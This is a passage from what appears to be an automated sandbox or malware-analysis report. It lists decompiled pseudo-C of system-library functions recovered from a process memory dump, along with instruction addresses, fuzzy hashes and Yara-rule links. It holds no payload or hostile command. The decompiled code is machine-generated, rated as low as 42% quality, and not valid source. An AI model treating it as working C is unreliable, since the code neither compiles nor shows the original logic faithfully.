					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0525D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L052477F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x052a46b7
0x052a46ba
0x052a46c5
0x052a46c8
0x052a46d0
0x052a46d4
0x052a46e6
0x052a46e9
0x052a46f4
0x052a46ff
0x052a4705
0x052a4706
0x052a470c
0x052a4713
0x052a471b
0x052a4723
0x052a4725
0x052a46d6
0x052a46d9
0x052a46db
0x052a46db
0x052a4732

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: e3e4a2c7070c3cbd57ad8a52afa426789631da46e047d7a1a0082779439e02b7
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 1B11E572614208BBCB05AF5CD8809BEB7B9EF95310F10806AFD44CB351DA71CD55D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0522C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0522C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x531d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0523EEF0(0x53170a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E052AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0523EB70(_t29, 0x53170a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0526B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E052AF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x53170c0; // 0x0
					while(_t38 != 0x53170c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x531b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0522c96a
0x0522c974
0x0522c988
0x0522c98a
0x05297c9d
0x05297c9f
0x05297ca4
0x05297cae
0x05297cf0
0x05297cf5
0x05297cfa
0x0522c992
0x0522c996
0x0522c997
0x0522c998
0x0522c9a3
0x0522c9a3
0x05297cb0
0x05297cb7
0x05297cbb
0x00000000
0x00000000
0x05297cbd
0x05297ce8
0x05297cc5
0x05297cc8
0x05297cca
0x05297cd0
0x05297cd6
0x05297cde
0x05297ce4
0x05297ce4
0x05297cd0
0x00000000
0x05297ce8
0x0522c990
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7cac9730bcb40c3f2a98ea211382d73348ff02912bfdc977aeb84d0fb7be7fd
Instruction ID: 80a1006dbe14b8389b3ce5b00814eb4caec5bc0493aaceb20bcfc4d29d321ed9
Opcode Fuzzy Hash: f7cac9730bcb40c3f2a98ea211382d73348ff02912bfdc977aeb84d0fb7be7fd
Instruction Fuzzy Hash: 2A11AC323307069BCB18AE38D88AA2ABBAAFF85610F090529F84597650DB20EC14C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 052637F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E052637F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E05242280(_t6, 0x5318550);
				}
				_t29 = E0526387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0523FFB0(0x5318550, _t27, 0x5318550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x052637fa
0x052637fc
0x05263805
0x05263808
0x05263808
0x05263814
0x05263818
0x05263846
0x05263848
0x0526384b
0x0526384b
0x05263852
0x00000000
0x05263854
0x05263856
0x00000000
0x00000000
0x05263863
0x00000000
0x05263863
0x0526381a
0x0526381a
0x0526381f
0x0526386e
0x0526386e
0x05263871
0x05263873
0x05263873
0x05263868
0x00000000
0x05263868
0x05263821
0x05263826
0x00000000
0x00000000
0x05263828
0x0526382a
0x05263841
0x00000000
0x05263841

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2125f9fe27948c2e17bc24d2888557840475a6dac5b3346ad4fffa18259440f5
Instruction ID: 7da5645a401a2f824e4235b1462ad965f14d1d04df88d1fc7bd6c1d81ddc1af1
Opcode Fuzzy Hash: 2125f9fe27948c2e17bc24d2888557840475a6dac5b3346ad4fffa18259440f5
Instruction Fuzzy Hash: 7001DB72A256119BC337CB199940E7ABBB7EF96B607154869E94D8B211D730C841C790

Uniqueness

Uniqueness Score: -1.00%

Function 0525002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0525002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E05247D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E05247D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E05247D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E05247D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x05250032
0x05250037
0x05250043
0x05294b3a
0x05250049
0x05250049
0x05250049
0x0525004e
0x05250053
0x05294b48
0x05294b5a
0x05294b4a
0x05294b53
0x05294b53
0x05294b5f
0x00000000
0x05294b61
0x00000000
0x05294b61
0x05250059
0x05250059
0x05250060
0x05294b6f
0x05294b6f
0x05250069
0x05294b83
0x00000000
0x00000000
0x05294b90
0x05294b9b
0x05294b9b
0x05294ba4
0x00000000
0x00000000
0x05294baa
0x00000000
0x0525006f
0x0525006f
0x00000000
0x0525006f
0x05250069

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 5e8b735c32a0914c55d637fdd04fc5a03e3c4e54d8f301c5ccd33f764fff19ff
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 6711C231A35682CFDF26AB64C968B3537D6FF40764F0900A0DD1987792E37AD842C690

Uniqueness

Uniqueness Score: -1.00%

Function 0523766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0523766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0525F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0525F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L05244620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x05237672
0x0523767f
0x05237689
0x052376de
0x052376de
0x0523768b
0x05237691
0x05237693
0x05237697
0x00000000
0x05237699
0x052376a8
0x00000000
0x052376aa
0x052376ad
0x052376b1
0x00000000
0x052376b3
0x052376b3
0x052376b5
0x052376ba
0x052376bc
0x052376bc
0x052376c0
0x00000000
0x052376c2
0x052376ce
0x052376ce
0x052376c0
0x052376b1
0x052376a8
0x05237697
0x052376d9

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 8020d4554d391b60e2fa24f5fa392af3664986b919ffc51891d5afda06efddc8
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: BD0188F2720119BBDB21DE5FCD56E5B77ADEF84660B180535BD09CB254DA30DE018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 052BC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E052BC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E05269910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E052695B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E052695D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E052695D0();
				return L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x052bc458
0x052bc45d
0x052bc466
0x052bc468
0x052bc469
0x052bc46a
0x052bc46b
0x052bc46e
0x052bc46f
0x052bc471
0x052bc476
0x052bc476
0x052bc47c
0x052bc47e
0x052bc480
0x052bc480
0x052bc483
0x052bc484
0x052bc486
0x052bc488
0x052bc48f
0x052bc491
0x052bc493
0x052bc493
0x052bc48f
0x052bc498
0x052bc49e
0x052bc4ad
0x052bc4ad
0x052bc4b2
0x052bc4b4
0x052bc4cd

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 7889ec1c07a158f79d5bb631309fc62f7720cd7a69d9716c0ecc04370730a9a5
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 98019E72250506BFE725AF69CC84EA2F77DFF54390F004526F219525A0CB72ACE1CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 05229080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E05229080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x53185ec;
				E05242280(_t48, 0x53185ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0523FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x531538c; // 0x77f06888
					if( *_t84 != 0x5315388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x52ff6e8);
						E0527D0E8(0x53185ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E052F88F5(_t80, _t85, 0x5315388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x53186c0; // 0x11407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x53186b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E05242280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E052F88F5(0x53185ec, _t85, 0x5315388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0526AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x531b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x53184c0;
																			if(_t82 >=  *0x53184c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E052F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0522922A(_t99);
										_t64 = E05247D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E052F8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x53186c0; // 0x11407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x53186b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x53186bc;
													_t87 = 0x53186b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E05229240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x53186c4;
												_t87 = 0x53186c0;
												L27:
												E05259B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0527D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x5315388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x531538c = _t51;
						goto L6;
					}
				}
			}

0x05229082
0x05229083
0x05229084
0x05229085
0x05229087
0x05229096
0x05229098
0x05229098
0x0522909e
0x052290a8
0x052290e7
0x052290e7
0x052290aa
0x052290b0
0x052290b7
0x052290bd
0x052290dd
0x052290e6
0x052290bf
0x052290bf
0x052290c7
0x052290cf
0x052290f1
0x052290f2
0x052290f4
0x052290f5
0x052290f6
0x052290f7
0x052290f8
0x052290f9
0x052290fa
0x052290fb
0x052290fc
0x052290fd
0x052290fe
0x052290ff
0x05229100
0x05229102
0x05229107
0x0522910c
0x05229110
0x05229113
0x05229115
0x05229136
0x0522913f
0x05229143
0x052837e4
0x052837e4
0x05229117
0x05229117
0x0522911d
0x00000000
0x0522911f
0x0522911f
0x05229125
0x00000000
0x05229127
0x0522912d
0x05229130
0x05229134
0x05229158
0x0522915d
0x05229161
0x05229168
0x05283715
0x0522916e
0x0522916e
0x05229175
0x05229177
0x0522917e
0x0522917f
0x05229182
0x05229182
0x05229187
0x05229187
0x0522918a
0x0522918d
0x0522918f
0x05229192
0x05229195
0x05229198
0x05229198
0x05229198
0x0522919a
0x00000000
0x00000000
0x0528371f
0x05283721
0x05283727
0x0528372f
0x05283733
0x05283735
0x05283738
0x0528373b
0x0528373d
0x05283740
0x00000000
0x05283746
0x05283746
0x05283749
0x00000000
0x0528374f
0x0528374f
0x05283751
0x05283757
0x05283759
0x0528375c
0x0528375c
0x0528375e
0x0528375e
0x05283761
0x05283764
0x00000000
0x00000000
0x05283766
0x05283768
0x052837a3
0x052837a3
0x052837a5
0x052837a7
0x052837ad
0x052837b0
0x052837b2
0x052837bc
0x052837c2
0x052837c2
0x052837b2
0x05229187
0x05229187
0x0522918a
0x0522918d
0x0522918f
0x05229192
0x05229195
0x00000000
0x05229195
0x00000000
0x0528376a
0x0528376a
0x0528376a
0x0528376c
0x0528376c
0x0528376f
0x05283775
0x00000000
0x00000000
0x05283777
0x05283779
0x05283782
0x05283787
0x05283789
0x05283790
0x05283790
0x0528378b
0x0528378b
0x0528378b
0x05283792
0x05283795
0x00000000
0x05283795
0x00000000
0x05283779
0x05283798
0x00000000
0x05283798
0x00000000
0x05283768
0x0528379b
0x0528379b
0x05283751
0x05283749
0x00000000
0x05283740
0x052291a0
0x052291a3
0x052291a9
0x052291b0
0x00000000
0x052291b0
0x05229187
0x052291b4
0x052291b4
0x052291bb
0x052291c0
0x052291c5
0x052291c7
0x052837da
0x052291cd
0x052291cd
0x052291cd
0x052291d2
0x052291d5
0x05229239
0x05229239
0x052291d7
0x052291db
0x052291e1
0x052291e7
0x052291fd
0x05229203
0x0522921e
0x05229223
0x00000000
0x05229205
0x05229205
0x05229208
0x0522920c
0x05229214
0x05229214
0x0522920c
0x052291e9
0x052291e9
0x052291ee
0x052291f3
0x052291f3
0x052291f3
0x052291e7
0x00000000
0x00000000
0x00000000
0x05229134
0x05229125
0x0522911d
0x0522914e
0x052290d1
0x052290d1
0x052290d3
0x052290d6
0x052290d8
0x00000000
0x052290d8
0x052290cf

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2c9eaca52af1706cab6df32edc94ef212279e8c08ccb4daa52e49554e1ced4
Instruction ID: 2e9fdd4ba31f0943e2185407138dc8b42add153e87a38ac7aaf8bbb2e1131f5c
Opcode Fuzzy Hash: 1a2c9eaca52af1706cab6df32edc94ef212279e8c08ccb4daa52e49554e1ced4
Instruction Fuzzy Hash: 9D01F4766212199FC3288F18E840B21BBBAFF81320F214126F5098F691C774DDC1CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 052F4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E052F4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E05242280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E05242280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x53186ac);
					E0522F900(0x53186d4, _t28);
					E0523FFB0(0x53186ac, _t28, 0x53186ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0523FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x052f401a
0x052f401e
0x052f4023
0x052f4028
0x052f4029
0x052f402b
0x052f402f
0x052f4043
0x052f4046
0x052f4051
0x052f4057
0x052f405f
0x052f4062
0x052f4067
0x052f406f
0x052f407c
0x052f407c
0x052f408c
0x052f408c
0x052f4097

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e58b2d0dd5ba9c150c5a6195a79860e805efd75e90a68f4b60d13a7317802e
Instruction ID: 07f27a75b8ca2ab4bc3b0666699bc98c7bcf3c9e38c4cd22e8f3caf798ed0b94
Opcode Fuzzy Hash: 36e58b2d0dd5ba9c150c5a6195a79860e805efd75e90a68f4b60d13a7317802e
Instruction Fuzzy Hash: 99018F72711945BFC719AB79CE88E53F7ACFF45660B000229FA0883A61DB24EC11CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 052E14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E052E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x531d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0526FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E05247D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0526B640(E05269AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x052e14fb
0x052e14fb
0x052e150a
0x052e1514
0x052e1519
0x052e151b
0x052e1526
0x052e152c
0x052e1534
0x052e1537
0x052e153a
0x052e1545
0x052e1557
0x052e1547
0x052e1550
0x052e1550
0x052e1562
0x052e1563
0x052e1565
0x052e156a
0x052e157f

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6cb0dec779f6505109e49af71543a643b6dbc36e8e01be59af3964bc5c29d2
Instruction ID: 49bdc912ae06244420024edfd2029694831bda1b7e1d56bf6a0ea5410b4add25
Opcode Fuzzy Hash: fe6cb0dec779f6505109e49af71543a643b6dbc36e8e01be59af3964bc5c29d2
Instruction Fuzzy Hash: 6701B571A10258AFCB04DFA8D845EAEBBB8EF44700F404066F915EB380DA70DE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 052E138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

